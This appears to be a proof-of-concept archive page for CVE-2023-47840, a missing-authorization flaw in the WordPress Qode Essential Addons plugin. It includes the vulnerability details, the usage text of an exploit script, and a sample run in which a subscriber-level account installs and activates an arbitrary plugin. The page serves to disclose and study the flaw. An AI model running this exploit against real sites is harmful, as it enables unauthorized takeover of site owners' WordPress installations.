Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-47840 PoC — WordPress Qode Essential Addons Plugin <= 1.5.2 is vulnerable to Remote Code Execution (RCE)

Source
https://github.com/RandomRobbieBF/CVE-2023-47840
Associated Vulnerability
Title:WordPress Qode Essential Addons Plugin <= 1.5.2 is vulnerable to Remote Code Execution (RCE) (CVE-2023-47840)
Description:Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons.This issue affects Qode Essential Addons: from n/a through 1.5.2.
Description
Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Readme
# CVE-2023-47840
Qode Essential Addons &lt;= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation

### Description:
The Qode Essential Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin() function in all versions up to, and including, 1.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.

```
Severity: medium
CVE ID: CVE-2023-47840
CVSS Score: 4.3
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Plugin Slug: qode-essential-addons
WPScan URL: https://www.wpscan.com/plugin/qode-essential-addons
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/443c59b9-275d-4d17-a870-9ae013c1a5c1
SVN Link: https://plugins.trac.wordpress.org/changeset/2996356/qode-essential-addons/trunk/inc/admin/inc/admin-pages/sub-pages/import/class-qodeessentialaddons-framework-import-plugins.php
Patchstack: https://patchstack.com/database/vulnerability/qode-essential-addons/wordpress-qode-essential-addons-plugin-1-5-2-arbitrary-plugin-installation-and-activation-vulnerability
```

How to use
---

```
usage: CVE-2023-47840.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG

Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description CVE-2023-47840 - The Qode Essential Addons plugin for WordPress is vulnerable to unauthorized
modification of data due to a missing capability check on the install_plugin() function in all versions up to, and including, 1.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to
install and activate arbitrary plugins.

options:
  -h, --help           show this help message and exit
  --url URL            URL of the WordPress site
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password
  --slug SLUG          WordPress Plugin Slug
```

POC
---

```
$ python3 CVE-2023-47840.py --url http://wordpress.lan --username user --password useruser1 --slug olympus-google-fonts
Logged in successfully.
Getting REST API Nonce!
Nonce Found: 1d0f559912
Installing Plugin!
HTTP STATUS: 200 Response:
Activate Plugin!
HTTP STATUS: 200 Response: {"status":"success","message":"Activated","data":null,"redirect":""}
```
File Snapshot

 [4.0K]  /data/pocs/b3d6c4afb90826e294deae8252466680ea11c629
├── [3.7K]  CVE-2023-47840.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →